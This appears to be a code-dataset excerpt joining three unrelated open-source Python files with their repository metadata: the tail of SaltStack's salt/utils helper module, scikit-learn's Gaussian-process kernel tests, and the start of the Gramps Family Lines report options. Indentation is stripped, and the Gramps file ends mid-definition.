if oper == '!=':
return cmp_result not in cmp_map['==']
else:
# Gracefully handle cmp_result not in (-1, 0, 1).
if cmp_result < -1:
cmp_result = -1
elif cmp_result > 1:
cmp_result = 1
return cmp_result in cmp_map[oper]
def compare_dicts(old=None, new=None):
'''
Compare before and after results from various salt functions, returning a
dict describing the changes that were made.
'''
ret = {}
for key in set((new or {})).union((old or {})):
if key not in old:
# New key
ret[key] = {'old': '',
'new': new[key]}
elif key not in new:
# Key removed
ret[key] = {'new': '',
'old': old[key]}
elif new[key] != old[key]:
# Key modified
ret[key] = {'old': old[key],
'new': new[key]}
return ret
def compare_lists(old=None, new=None):
'''
Compare before and after results from various salt functions, returning a
dict describing the changes that were made
'''
ret = dict()
for item in new:
if item not in old:
ret['new'] = item
for item in old:
if item not in new:
ret['old'] = item
return ret
def argspec_report(functions, module=''):
'''
Pass in a functions dict as it is returned from the loader and return the
argspec function signatures
'''
ret = {}
# TODO: cp.get_file will also match cp.get_file_str. this is the
# same logic as sys.doc, and it is not working as expected, see
# issue #3614
_use_fnmatch = False
if '*' in module:
target_mod = module
_use_fnmatch = True
elif module:
# allow both "sys" and "sys." to match sys, without also matching
# sysctl
target_module = module + '.' if not module.endswith('.') else module
else:
target_module = ''
if _use_fnmatch:
for fun in fnmatch.filter(functions, target_mod):
try:
aspec = salt.utils.args.get_function_argspec(functions[fun])
except TypeError:
# this happens if not callable
continue
args, varargs, kwargs, defaults = aspec
ret[fun] = {}
ret[fun]['args'] = args if args else None
ret[fun]['defaults'] = defaults if defaults else None
ret[fun]['varargs'] = True if varargs else None
ret[fun]['kwargs'] = True if kwargs else None
else:
for fun in functions:
if fun == module or fun.startswith(target_module):
try:
aspec = salt.utils.args.get_function_argspec(functions[fun])
except TypeError:
# this happens if not callable
continue
args, varargs, kwargs, defaults = aspec
ret[fun] = {}
ret[fun]['args'] = args if args else None
ret[fun]['defaults'] = defaults if defaults else None
ret[fun]['varargs'] = True if varargs else None
ret[fun]['kwargs'] = True if kwargs else None
return ret
def decode_list(data):
'''
JSON decodes as unicode, Jinja needs bytes...
'''
rv = []
for item in data:
if isinstance(item, six.text_type) and six.PY2:
item = item.encode('utf-8')
elif isinstance(item, list):
item = decode_list(item)
elif isinstance(item, dict):
item = decode_dict(item)
rv.append(item)
return rv
def decode_dict(data):
'''
JSON decodes as unicode, Jinja needs bytes...
'''
rv = {}
for key, value in six.iteritems(data):
if isinstance(key, six.text_type) and six.PY2:
key = key.encode('utf-8')
if isinstance(value, six.text_type) and six.PY2:
value = value.encode('utf-8')
elif isinstance(value, list):
value = decode_list(value)
elif isinstance(value, dict):
value = decode_dict(value)
rv[key] = value
return rv
def find_json(raw):
'''
Pass in a raw string and load the json when is starts. This allows for a
string to start with garbage and end with json but be cleanly loaded
'''
ret = {}
for ind in range(len(raw)):
working = '\n'.join(raw.splitlines()[ind:])
try:
ret = json.loads(working, object_hook=decode_dict)
except ValueError:
continue
if ret:
return ret
if not ret:
# Not json, raise an error
raise ValueError
def is_bin_file(path):
'''
Detects if the file is a binary, returns bool. Returns True if the file is
a bin, False if the file is not and None if the file is not available.
'''
if not os.path.isfile(path):
return None
try:
with fopen(path, 'r') as fp_:
return is_bin_str(fp_.read(2048))
except os.error:
return None
def is_bin_str(data):
'''
Detects if the passed string of data is bin or text
'''
if '\0' in data:
return True
if not data:
return False
text_characters = ''.join([chr(x) for x in range(32, 127)] + list('\n\r\t\b'))
# Get the non-text characters (map each character to itself then use the
# 'remove' option to get rid of the text characters.)
if six.PY3:
trans = ''.maketrans('', '', text_characters)
nontext = data.translate(trans)
else:
trans = string.maketrans('', '')
nontext = data.translate(trans, text_characters)
# If more than 30% non-text characters, then
# this is considered a binary file
if len(nontext) / len(data) > 0.30:
return True
return False
def is_dictlist(data):
'''
Returns True if data is a list of one-element dicts (as found in many SLS
schemas), otherwise returns False
'''
if isinstance(data, list):
for element in data:
if isinstance(element, dict):
if len(element) != 1:
return False
else:
return False
return True
return False
def repack_dictlist(data):
'''
Takes a list of one-element dicts (as found in many SLS schemas) and
repacks into a single dictionary.
'''
if isinstance(data, six.string_types):
try:
import yaml
data = yaml.safe_load(data)
except yaml.parser.ParserError as err:
log.error(err)
return {}
if not isinstance(data, list) \
or [x for x in data
if not isinstance(x, (six.string_types, int, float, dict))]:
log.error('Invalid input: {0}'.format(pprint.pformat(data)))
log.error('Input must be a list of strings/dicts')
return {}
ret = {}
for element in data:
if isinstance(element, (six.string_types, int, float)):
ret[element] = None
else:
if len(element) != 1:
log.error('Invalid input: key/value pairs must contain '
'only one element (data passed: {0}).'
.format(element))
return {}
ret.update(element)
return ret
def get_group_list(user=None, include_default=True):
'''
Returns a list of all of the system group names of which the user
is a member.
'''
if HAS_GRP is False or HAS_PWD is False:
# We don't work on platforms that don't have grp and pwd
# Just return an empty list
return []
group_names = None
ugroups = set()
if not isinstance(user, six.string_types):
raise Exception
if hasattr(os, 'getgrouplist'):
# Try os.getgrouplist, available in python >= 3.3
log.trace('Trying os.getgrouplist for \'{0}\''.format(user))
try:
group_names = [
grp.getgrgid(grpid).gr_name for grpid in
os.getgrouplist(user, pwd.getpwnam(user).pw_gid)
]
except Exception:
pass
else:
# Try pysss.getgrouplist
log.trace('Trying pysss.getgrouplist for \'{0}\''.format(user))
try:
import pysss # pylint: disable=import-error
group_names = list(pysss.getgrouplist(user))
except Exception:
pass
if group_names is None:
# Fall back to generic code
# Include the user's default group to behave like
# os.getgrouplist() and pysss.getgrouplist() do
log.trace('Trying generic group list for \'{0}\''.format(user))
group_names = [g.gr_name for g in grp.getgrall() if user in g.gr_mem]
try:
default_group = grp.getgrgid(pwd.getpwnam(user).pw_gid).gr_name
if default_group not in group_names:
group_names.append(default_group)
except KeyError:
# If for some reason the user does not have a default group
pass
ugroups.update(group_names)
if include_default is False:
# Historically, saltstack code for getting group lists did not
# include the default group. Some things may only want
# supplemental groups, so include_default=False omits the users
# default group.
try:
default_group = grp.getgrgid(pwd.getpwnam(user).pw_gid).gr_name
ugroups.remove(default_group)
except KeyError:
# If for some reason the user does not have a default group
pass
log.trace('Group list for user \'{0}\': \'{1}\''.format(user, sorted(ugroups)))
return sorted(ugroups)
def get_group_dict(user=None, include_default=True):
'''
Returns a dict of all of the system groups as keys, and group ids
as values, of which the user is a member.
E.g.: {'staff': 501, 'sudo': 27}
'''
if HAS_GRP is False or HAS_PWD is False:
# We don't work on platforms that don't have grp and pwd
# Just return an empty dict
return {}
group_dict = {}
group_names = get_group_list(user, include_default=include_default)
for group in group_names:
group_dict.update({group: grp.getgrnam(group).gr_gid})
return group_dict
def get_gid_list(user=None, include_default=True):
'''
Returns a list of all of the system group IDs of which the user
is a member.
'''
if HAS_GRP is False or HAS_PWD is False:
# We don't work on platforms that don't have grp and pwd
# Just return an empty list
return []
gid_list = [
gid for (group, gid) in
six.iteritems(salt.utils.get_group_dict(user, include_default=include_default))
]
return sorted(set(gid_list))
def total_seconds(td):
'''
Takes a timedelta and returns the total number of seconds
represented by the object. Wrapper for the total_seconds()
method which does not exist in versions of Python < 2.7.
'''
return (td.microseconds + (td.seconds + td.days * 24 * 3600) * 10**6) / 10**6
def import_json():
'''
Import a json module, starting with the quick ones and going down the list)
'''
for fast_json in ('ujson', 'yajl', 'json'):
try:
mod = __import__(fast_json)
log.trace('loaded {0} json lib'.format(fast_json))
return mod
except ImportError:
continue
def appendproctitle(name):
'''
Append "name" to the current process title
'''
if HAS_SETPROCTITLE:
setproctitle.setproctitle(setproctitle.getproctitle() + ' ' + name)
def chugid(runas):
'''
Change the current process to belong to
the imputed user (and the groups he belongs to)
'''
uinfo = pwd.getpwnam(runas)
supgroups = []
supgroups_seen = set()
# The line below used to exclude the current user's primary gid.
# However, when root belongs to more than one group
# this causes root's primary group of '0' to be dropped from
# his grouplist. On FreeBSD, at least, this makes some
# command executions fail with 'access denied'.
#
# The Python documentation says that os.setgroups sets only
# the supplemental groups for a running process. On FreeBSD
# this does not appear to be strictly true.
group_list = get_group_dict(runas, include_default=True)
if sys.platform == 'darwin':
group_list = dict((k, v) for k, v in six.iteritems(group_list)
if not k.startswith('_'))
for group_name in group_list:
gid = group_list[group_name]
if (gid not in supgroups_seen
and not supgroups_seen.add(gid)):
supgroups.append(gid)
if os.getgid() != uinfo.pw_gid:
try:
os.setgid(uinfo.pw_gid)
except OSError as err:
raise CommandExecutionError(
'Failed to change from gid {0} to {1}. Error: {2}'.format(
os.getgid(), uinfo.pw_gid, err
)
)
# Set supplemental groups
if sorted(os.getgroups()) != sorted(supgroups):
try:
os.setgroups(supgroups)
except OSError as err:
raise CommandExecutionError(
'Failed to set supplemental groups to {0}. Error: {1}'.format(
supgroups, err
)
)
if os.getuid() != uinfo.pw_uid:
try:
os.setuid(uinfo.pw_uid)
except OSError as err:
raise CommandExecutionError(
'Failed to change from uid {0} to {1}. Error: {2}'.format(
os.getuid(), uinfo.pw_uid, err
)
)
def chugid_and_umask(runas, umask):
'''
Helper method for for subprocess.Popen to initialise uid/gid and umask
for the new process.
'''
if runas is not None:
chugid(runas)
if umask is not None:
os.umask(umask)
def rand_string(size=32):
key = os.urandom(size)
return key.encode('base64').replace('\n', '')
def relpath(path, start='.'):
'''
Work around Python bug #5117, which is not (and will not be) patched in
Python 2.6 (http://bugs.python.org/issue5117)
'''
if sys.version_info < (2, 7) and 'posix' in sys.builtin_module_names:
# The below code block is based on posixpath.relpath from Python 2.7,
# which has the fix for this bug.
if not path:
raise ValueError('no path specified')
start_list = [
x for x in os.path.abspath(start).split(os.path.sep) if x
]
path_list = [
x for x in os.path.abspath(path).split(os.path.sep) if x
]
# work out how much of the filepath is shared by start and path.
i = len(os.path.commonprefix([start_list, path_list]))
rel_list = [os.path.pardir] * (len(start_list)-i) + path_list[i:]
if not rel_list:
return os.path.curdir
return os.path.join(*rel_list)
return os.path.relpath(path, start=start)
def human_size_to_bytes(human_size):
'''
Convert human-readable units to bytes
'''
size_exp_map = {'K': 1, 'M': 2, 'G': 3, 'T': 4, 'P': 5}
human_size_str = str(human_size)
match = re.match(r'^(\d+)([KMGTP])?$', human_size_str)
if not match:
raise ValueError(
'Size must be all digits, with an optional unit type '
'(K, M, G, T, or P)'
)
size_num = int(match.group(1))
unit_multiplier = 1024 ** size_exp_map.get(match.group(2), 0)
return size_num * unit_multiplier
def to_str(s, encoding=None):
'''
Given str, bytes, bytearray, or unicode (py2), return str
'''
if isinstance(s, str):
return s
if six.PY3:
if isinstance(s, (bytes, bytearray)):
return s.decode(encoding or __salt_system_encoding__)
raise TypeError('expected str, bytes, or bytearray')
else:
if isinstance(s, bytearray):
return str(s)
if isinstance(s, unicode): # pylint: disable=incompatible-py3-code
return s.encode(encoding or __salt_system_encoding__)
raise TypeError('expected str, bytearray, or unicode')
def to_bytes(s, encoding=None):
'''
Given bytes, bytearray, str, or unicode (python 2), return bytes (str for
python 2)
'''
if six.PY3:
if isinstance(s, bytes):
return s
if isinstance(s, bytearray):
return bytes(s)
if isinstance(s, str):
return s.encode(encoding or __salt_system_encoding__)
raise TypeError('expected bytes, bytearray, or str')
else:
return to_str(s, encoding)
def to_unicode(s, encoding=None):
'''
Given str or unicode, return unicode (str for python 3)
'''
if six.PY3:
return to_str(s, encoding)
else:
if isinstance(s, str):
return s.decode(encoding or __salt_system_encoding__)
return unicode(s) # pylint: disable=incompatible-py3-code
def is_list(value):
'''
Check if a variable is a list.
'''
return isinstance(value, list)
def is_iter(y, ignore=six.string_types):
'''
Test if an object is iterable, but not a string type.
Test if an object is an iterator or is iterable itself. By default this
does not return True for string objects.
The `ignore` argument defaults to a list of string types that are not
considered iterable. This can be used to also exclude things like
dictionaries or named tuples.
Based on https://bitbucket.org/petershinners/yter
'''
if ignore and isinstance(y, ignore):
return False
try:
iter(y)
return True
except TypeError:
return False
def invalid_kwargs(invalid_kwargs, raise_exc=True):
'''
Raise a SaltInvocationError if invalid_kwargs is non-empty
'''
if invalid_kwargs:
if isinstance(invalid_kwargs, dict):
new_invalid = [
'{0}={1}'.format(x, y)
for x, y in six.iteritems(invalid_kwargs)
]
invalid_kwargs = new_invalid
msg = (
'The following keyword arguments are not valid: {0}'
.format(', '.join(invalid_kwargs))
)
if raise_exc:
raise SaltInvocationError(msg)
else:
return msg
def shlex_split(s, **kwargs):
'''
Only split if variable is a string
'''
if isinstance(s, six.string_types):
return shlex.split(s, **kwargs)
else:
return s
def split_input(val):
'''
Take an input value and split it into a list, returning the resulting list
'''
if isinstance(val, list):
return val
try:
return [x.strip() for x in val.split(',')]
except AttributeError:
return [x.strip() for x in str(val).split(',')]
def str_version_to_evr(verstring):
'''
Split the package version string into epoch, version and release.
Return this as tuple.
The epoch is always not empty. The version and the release can be an empty
string if such a component could not be found in the version string.
"2:1.0-1.2" => ('2', '1.0', '1.2)
"1.0" => ('0', '1.0', '')
"" => ('0', '', '')
'''
if verstring in [None, '']:
return '0', '', ''
idx_e = verstring.find(':')
if idx_e != -1:
try:
epoch = str(int(verstring[:idx_e]))
except ValueError:
# look, garbage in the epoch field, how fun, kill it
epoch = '0' # this is our fallback, deal
else:
epoch = '0'
idx_r = verstring.find('-')
if idx_r != -1:
version = verstring[idx_e + 1:idx_r]
release = verstring[idx_r + 1:]
else:
version = verstring[idx_e + 1:]
release = ''
return epoch, version, release
|
stephane-martin/salt-debian-packaging
|
salt-2016.3.2/salt/utils/__init__.py
|
Python
|
apache-2.0
| 93,870
|
[
"VisIt"
] |
dba6828bd1056d4bdb2c8d0eb3ccef766f449451d73bab0c49b0f387f39ce324
|
"""Testing for kernels for Gaussian processes."""
# Author: Jan Hendrik Metzen <jhm@informatik.uni-bremen.de>
# Licence: BSD 3 clause
from collections import Hashable
import numpy as np
from sklearn.base import clone
from sklearn.externals.funcsigs import signature
from sklearn.gaussian_process.kernels \
import (RBF, Matern, RationalQuadratic, ExpSineSquared, DotProduct,
ConstantKernel, WhiteKernel, PairwiseKernel, KernelOperator,
Exponentiation)
from sklearn.gaussian_process.kernels import _approx_fprime
from sklearn.metrics.pairwise \
import PAIRWISE_KERNEL_FUNCTIONS, euclidean_distances, pairwise_kernels
from sklearn.utils.testing import (assert_equal, assert_almost_equal,
assert_not_equal, assert_array_equal,
assert_array_almost_equal)
X = np.random.RandomState(0).normal(0, 1, (5, 2))
Y = np.random.RandomState(0).normal(0, 1, (6, 2))
kernel_white = RBF(length_scale=2.0) + WhiteKernel(noise_level=3.0)
kernels = [RBF(length_scale=2.0), RBF(length_scale_bounds=(0.5, 2.0)),
ConstantKernel(constant_value=10.0),
2.0 * RBF(length_scale=0.33, length_scale_bounds="fixed"),
2.0 * RBF(length_scale=0.5), kernel_white,
2.0 * RBF(length_scale=[0.5, 2.0]),
2.0 * Matern(length_scale=0.33, length_scale_bounds="fixed"),
2.0 * Matern(length_scale=0.5, nu=0.5),
2.0 * Matern(length_scale=1.5, nu=1.5),
2.0 * Matern(length_scale=2.5, nu=2.5),
2.0 * Matern(length_scale=[0.5, 2.0], nu=0.5),
3.0 * Matern(length_scale=[2.0, 0.5], nu=1.5),
4.0 * Matern(length_scale=[0.5, 0.5], nu=2.5),
RationalQuadratic(length_scale=0.5, alpha=1.5),
ExpSineSquared(length_scale=0.5, periodicity=1.5),
DotProduct(sigma_0=2.0), DotProduct(sigma_0=2.0) ** 2]
for metric in PAIRWISE_KERNEL_FUNCTIONS:
if metric in ["additive_chi2", "chi2"]:
continue
kernels.append(PairwiseKernel(gamma=1.0, metric=metric))
def test_kernel_gradient():
""" Compare analytic and numeric gradient of kernels. """
for kernel in kernels:
K, K_gradient = kernel(X, eval_gradient=True)
assert_equal(K_gradient.shape[0], X.shape[0])
assert_equal(K_gradient.shape[1], X.shape[0])
assert_equal(K_gradient.shape[2], kernel.theta.shape[0])
def eval_kernel_for_theta(theta):
kernel_clone = kernel.clone_with_theta(theta)
K = kernel_clone(X, eval_gradient=False)
return K
K_gradient_approx = \
_approx_fprime(kernel.theta, eval_kernel_for_theta, 1e-10)
assert_almost_equal(K_gradient, K_gradient_approx, 4)
def test_kernel_theta():
""" Check that parameter vector theta of kernel is set correctly. """
for kernel in kernels:
if isinstance(kernel, KernelOperator) \
or isinstance(kernel, Exponentiation): # skip non-basic kernels
continue
theta = kernel.theta
_, K_gradient = kernel(X, eval_gradient=True)
# Determine kernel parameters that contribute to theta
init_sign = signature(kernel.__class__.__init__).parameters.values()
args = [p.name for p in init_sign if p.name != 'self']
theta_vars = map(lambda s: s.rstrip("_bounds"),
filter(lambda s: s.endswith("_bounds"), args))
assert_equal(
set(hyperparameter.name
for hyperparameter in kernel.hyperparameters),
set(theta_vars))
# Check that values returned in theta are consistent with
# hyperparameter values (being their logarithms)
for i, hyperparameter in enumerate(kernel.hyperparameters):
assert_equal(theta[i],
np.log(getattr(kernel, hyperparameter.name)))
# Fixed kernel parameters must be excluded from theta and gradient.
for i, hyperparameter in enumerate(kernel.hyperparameters):
# create copy with certain hyperparameter fixed
params = kernel.get_params()
params[hyperparameter.name + "_bounds"] = "fixed"
kernel_class = kernel.__class__
new_kernel = kernel_class(**params)
# Check that theta and K_gradient are identical with the fixed
# dimension left out
_, K_gradient_new = new_kernel(X, eval_gradient=True)
assert_equal(theta.shape[0], new_kernel.theta.shape[0] + 1)
assert_equal(K_gradient.shape[2], K_gradient_new.shape[2] + 1)
if i > 0:
assert_equal(theta[:i], new_kernel.theta[:i])
assert_array_equal(K_gradient[..., :i],
K_gradient_new[..., :i])
if i + 1 < len(kernel.hyperparameters):
assert_equal(theta[i + 1:], new_kernel.theta[i:])
assert_array_equal(K_gradient[..., i + 1:],
K_gradient_new[..., i:])
# Check that values of theta are modified correctly
for i, hyperparameter in enumerate(kernel.hyperparameters):
theta[i] = np.log(42)
kernel.theta = theta
assert_almost_equal(getattr(kernel, hyperparameter.name), 42)
setattr(kernel, hyperparameter.name, 43)
assert_almost_equal(kernel.theta[i], np.log(43))
def test_auto_vs_cross():
""" Auto-correlation and cross-correlation should be consistent. """
for kernel in kernels:
if kernel == kernel_white:
continue # Identity is not satisfied on diagonal
K_auto = kernel(X)
K_cross = kernel(X, X)
assert_almost_equal(K_auto, K_cross, 5)
def test_kernel_diag():
""" Test that diag method of kernel returns consistent results. """
for kernel in kernels:
K_call_diag = np.diag(kernel(X))
K_diag = kernel.diag(X)
assert_almost_equal(K_call_diag, K_diag, 5)
def test_kernel_operator_commutative():
""" Adding kernels and multiplying kernels should be commutative. """
# Check addition
assert_almost_equal((RBF(2.0) + 1.0)(X),
(1.0 + RBF(2.0))(X))
# Check multiplication
assert_almost_equal((3.0 * RBF(2.0))(X),
(RBF(2.0) * 3.0)(X))
def test_kernel_anisotropic():
""" Anisotropic kernel should be consistent with isotropic kernels."""
kernel = 3.0 * RBF([0.5, 2.0])
K = kernel(X)
X1 = np.array(X)
X1[:, 0] *= 4
K1 = 3.0 * RBF(2.0)(X1)
assert_almost_equal(K, K1)
X2 = np.array(X)
X2[:, 1] /= 4
K2 = 3.0 * RBF(0.5)(X2)
assert_almost_equal(K, K2)
# Check getting and setting via theta
kernel.theta = kernel.theta + np.log(2)
assert_array_equal(kernel.theta, np.log([6.0, 1.0, 4.0]))
assert_array_equal(kernel.k2.length_scale, [1.0, 4.0])
def test_kernel_stationary():
""" Test stationarity of kernels."""
for kernel in kernels:
if not kernel.is_stationary():
continue
K = kernel(X, X + 1)
assert_almost_equal(K[0, 0], np.diag(K))
def test_kernel_clone():
""" Test that sklearn's clone works correctly on kernels. """
for kernel in kernels:
kernel_cloned = clone(kernel)
assert_equal(kernel, kernel_cloned)
assert_not_equal(id(kernel), id(kernel_cloned))
for attr in kernel.__dict__.keys():
attr_value = getattr(kernel, attr)
attr_value_cloned = getattr(kernel_cloned, attr)
if attr.startswith("hyperparameter_"):
assert_equal(attr_value.name, attr_value_cloned.name)
assert_equal(attr_value.value_type,
attr_value_cloned.value_type)
assert_array_equal(attr_value.bounds,
attr_value_cloned.bounds)
assert_equal(attr_value.n_elements,
attr_value_cloned.n_elements)
elif np.iterable(attr_value):
for i in range(len(attr_value)):
if np.iterable(attr_value[i]):
assert_array_equal(attr_value[i],
attr_value_cloned[i])
else:
assert_equal(attr_value[i], attr_value_cloned[i])
else:
assert_equal(attr_value, attr_value_cloned)
if not isinstance(attr_value, Hashable):
# modifiable attributes must not be identical
assert_not_equal(id(attr_value), id(attr_value_cloned))
def test_matern_kernel():
""" Test consistency of Matern kernel for special values of nu. """
K = Matern(nu=1.5, length_scale=1.0)(X)
# the diagonal elements of a matern kernel are 1
assert_array_almost_equal(np.diag(K), np.ones(X.shape[0]))
# matern kernel for coef0==0.5 is equal to absolute exponential kernel
K_absexp = np.exp(-euclidean_distances(X, X, squared=False))
K = Matern(nu=0.5, length_scale=1.0)(X)
assert_array_almost_equal(K, K_absexp)
# test that special cases of matern kernel (coef0 in [0.5, 1.5, 2.5])
# result in nearly identical results as the general case for coef0 in
# [0.5 + tiny, 1.5 + tiny, 2.5 + tiny]
tiny = 1e-10
for nu in [0.5, 1.5, 2.5]:
K1 = Matern(nu=nu, length_scale=1.0)(X)
K2 = Matern(nu=nu + tiny, length_scale=1.0)(X)
assert_array_almost_equal(K1, K2)
def test_kernel_versus_pairwise():
"""Check that GP kernels can also be used as pairwise kernels."""
for kernel in kernels:
# Test auto-kernel
if kernel != kernel_white:
# For WhiteKernel: k(X) != k(X,X). This is assumed by
# pairwise_kernels
K1 = kernel(X)
K2 = pairwise_kernels(X, metric=kernel)
assert_array_almost_equal(K1, K2)
# Test cross-kernel
K1 = kernel(X, Y)
K2 = pairwise_kernels(X, Y, metric=kernel)
assert_array_almost_equal(K1, K2)
def test_set_get_params():
"""Check that set_params()/get_params() is consistent with kernel.theta."""
for kernel in kernels:
# Test get_params()
index = 0
params = kernel.get_params()
for hyperparameter in kernel.hyperparameters:
if hyperparameter.bounds is "fixed":
continue
size = hyperparameter.n_elements
if size > 1: # anisotropic kernels
assert_almost_equal(np.exp(kernel.theta[index:index + size]),
params[hyperparameter.name])
index += size
else:
assert_almost_equal(np.exp(kernel.theta[index]),
params[hyperparameter.name])
index += 1
# Test set_params()
index = 0
value = 10 # arbitrary value
for hyperparameter in kernel.hyperparameters:
if hyperparameter.bounds is "fixed":
continue
size = hyperparameter.n_elements
if size > 1: # anisotropic kernels
kernel.set_params(**{hyperparameter.name: [value] * size})
assert_almost_equal(np.exp(kernel.theta[index:index + size]),
[value] * size)
index += size
else:
kernel.set_params(**{hyperparameter.name: value})
assert_almost_equal(np.exp(kernel.theta[index]), value)
index += 1
|
DailyActie/Surrogate-Model
|
01-codes/scikit-learn-master/sklearn/gaussian_process/tests/test_kernels.py
|
Python
|
mit
| 11,615
|
[
"Gaussian"
] |
6cbe372ddbcb0cb334ca29bcd142571d8888e69ef1caa6bcda06f17e893d1405
|
#
# Gramps - a GTK+/GNOME based genealogy program
#
# Copyright (C) 2007-2008 Stephane Charette
# Copyright (C) 2007-2008 Brian G. Matherly
# Copyright (C) 2009-2010 Gary Burton
# Contribution 2009 by Bob Ham <rah@bash.sh>
# Copyright (C) 2010 Jakim Friant
# Copyright (C) 2011 Paul Franklin
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#
# $Id$
"""
Family Lines, a GraphViz-based plugin for Gramps.
"""
from __future__ import unicode_literals
#------------------------------------------------------------------------
#
# python modules
#
#------------------------------------------------------------------------
from gramps.gen.const import GRAMPS_LOCALE as glocale
_ = glocale.get_translation().gettext
from functools import partial
#------------------------------------------------------------------------
#
# Set up logging
#
#------------------------------------------------------------------------
import logging
log = logging.getLogger(".FamilyLines")
#------------------------------------------------------------------------
#
# GRAMPS module
#
#------------------------------------------------------------------------
from gramps.gen.lib import EventRoleType, EventType, Person
from gramps.gen.utils.file import media_path_full
from gramps.gui.thumbnails import get_thumbnail_path
from gramps.gen.datehandler import displayer as _dd
from gramps.gen.plug.report import Report
from gramps.gen.plug.report import utils as ReportUtils
from gramps.gen.plug.report import MenuReportOptions
from gramps.gen.plug.menu import (NumberOption, ColorOption, BooleanOption,
EnumeratedListOption, PersonListOption,
SurnameColorOption)
from gramps.gen.utils.db import get_birth_or_fallback, get_death_or_fallback
from gramps.gen.display.name import displayer as name_displayer
#------------------------------------------------------------------------
#
# Constant options items
#
#------------------------------------------------------------------------
_COLORS = [ { 'name' : _("B&W outline"), 'value' : "outline" },
{ 'name' : _("Colored outline"), 'value' : "colored" },
{ 'name' : _("Color fill"), 'value' : "filled" }]
#------------------------------------------------------------------------
#
# A quick overview of the classes we'll be using:
#
# class FamilyLinesOptions(MenuReportOptions)
# - this class is created when the report dialog comes up
# - all configuration controls for the report are created here
# - see src/ReportBase/_ReportOptions.py for more information
#
# class FamilyLinesReport(Report)
# - this class is created only after the user clicks on "OK"
# - the actual report generation is done by this class
# - see src/ReportBase/_Report.py for more information
#
# Likely to be of additional interest is register_report() at the
# very bottom of this file.
#
#------------------------------------------------------------------------
class FamilyLinesOptions(MenuReportOptions):
"""
Defines all of the controls necessary
to configure the FamilyLines reports.
"""
def __init__(self, name, dbase):
self.limit_parents = None
self.max_parents = None
self.limit_children = None
self.max_children = None
self.include_images = None
self.image_location = None
MenuReportOptions.__init__(self, name, dbase)
def add_menu_options(self, menu):
# --------------------------------
add_option = partial(menu.add_option, _('People of Interest'))
# --------------------------------
person_list = PersonListOption(_('People of interest'))
person_list.set_help(_('People of interest are used as a starting '
'point when determining "family lines".'))
add_option('gidlist', person_list)
followpar = BooleanOption(
_('Follow parents to determine family lines'), True)
followpar.set_help(_('Parents and their ancestors will be '
'considered when determining "family lines".'))
add_option('followpar', followpar)
followchild = BooleanOption(_('Follow children to determine '
'"family lines"'), True)
followchild.set_help(_('Children will be considered when '
'determining "family lines".'))
add_option('followchild', followchild)
remove_extra_people = BooleanOption(
_('Try to remove extra people and families'), True)
remove_extra_people.set_help(_('People and families not directly '
'related to people of interest will '
'be removed when determining '
'"family lines".'))
add_option('removeextra', remove_extra_people)
# ----------------------------
add_option = partial(menu.add_option, _('Family Colors'))
# ----------------------------
surname_color = SurnameColorOption(_('Family colors'))
surname_color.set_help(_('Colors to use for various family lines.'))
add_option('surnamecolors', surname_color)
# -------------------------
add_option = partial(menu.add_option, _('Individuals'))
# -------------------------
color_males = ColorOption(_('Males'), '#e0e0ff')
color_males.set_help(_('The color to use to display men.'))
add_option('colormales', color_males)
color_females = ColorOption(_('Females'), '#ffe0e0')
color_females.set_help(_('The color to use to display women.'))
add_option('colorfemales', color_females)
color_unknown = ColorOption(_('Unknown'), '#e0e0e0')
color_unknown.set_help(_('The color to use '
'when the gender is unknown.'))
add_option('colorunknown', color_unknown)
color_family = ColorOption(_('Families'), '#ffffe0')
color_family.set_help(_('The color to use to display families.'))
add_option('colorfamilies', color_family)
self.limit_parents = BooleanOption(_('Limit the number of ancestors'),
False)
self.limit_parents.set_help(_('Whether to '
'limit the number of ancestors.'))
add_option('limitparents', self.limit_parents)
self.limit_parents.connect('value-changed', self.limit_changed)
self.max_parents = NumberOption('', 50, 10, 9999)
self.max_parents.set_help(_('The maximum number '
'of ancestors to include.'))
add_option('maxparents', self.max_parents)
self.limit_children = BooleanOption(_('Limit the number '
'of descendants'),
False)
self.limit_children.set_help(_('Whether to '
'limit the number of descendants.'))
add_option('limitchildren', self.limit_children)
self.limit_children.connect('value-changed', self.limit_changed)
self.max_children = NumberOption('', 50, 10, 9999)
self.max_children.set_help(_('The maximum number '
'of descendants to include.'))
add_option('maxchildren', self.max_children)
# --------------------
add_option = partial(menu.add_option, _('Images'))
# --------------------
self.include_images = BooleanOption(_('Include '
'thumbnail images of people'),
True)
self.include_images.set_help(_('Whether to '
'include thumbnail images of people.'))
add_option('incimages', self.include_images)
self.include_images.connect('value-changed', self.images_changed)
self.image_location = EnumeratedListOption(_('Thumbnail location'), 0)
self.image_location.add_item(0, _('Above the name'))
self.image_location.add_item(1, _('Beside the name'))
self.image_location.set_help(_('Where the thumbnail image '
'should appear relative to the name'))
add_option('imageonside', self.image_location)
# ---------------------
add_option = partial(menu.add_option, _('Options'))
# ---------------------
color = EnumeratedListOption(_("Graph coloring"), "filled")
for i in range(len(_COLORS)):
color.add_item(_COLORS[i]["value"], _COLORS[i]["name"])
color.set_help(_("Males will be shown with blue, females "
"with red, unless otherwise set above for filled. "
"If the sex of an individual "
"is unknown it will be shown with gray."))
add_option("color", color)
use_roundedcorners = BooleanOption(_('Use rounded corners'), False)
use_roundedcorners.set_help(_('Use rounded corners to differentiate '
'between women and men.'))
add_option("useroundedcorners", use_roundedcorners)
self.include_dates = BooleanOption(_('Include dates'), True)
self.include_dates.set_help(_('Whether to include dates for people '
'and families.'))
add_option('incdates', self.include_dates)
self.include_dates.connect('value-changed', self.include_dates_changed)
self.justyears = BooleanOption(_("Limit dates to years only"), False)
self.justyears.set_help(_("Prints just dates' year, neither "
"month or day nor date approximation "
"or interval are shown."))
add_option("justyears", self.justyears)
include_places = BooleanOption(_('Include places'), True)
include_places.set_help(_('Whether to include placenames for people '
'and families.'))
add_option('incplaces', include_places)
include_num_children = BooleanOption(
_('Include the number of children'), True)
include_num_children.set_help(_('Whether to include the number of '
'children for families with more '
'than 1 child.'))
add_option('incchildcnt', include_num_children)
include_private = BooleanOption(_('Include private records'), False)
include_private.set_help(_('Whether to include names, dates, and '
'families that are marked as private.'))
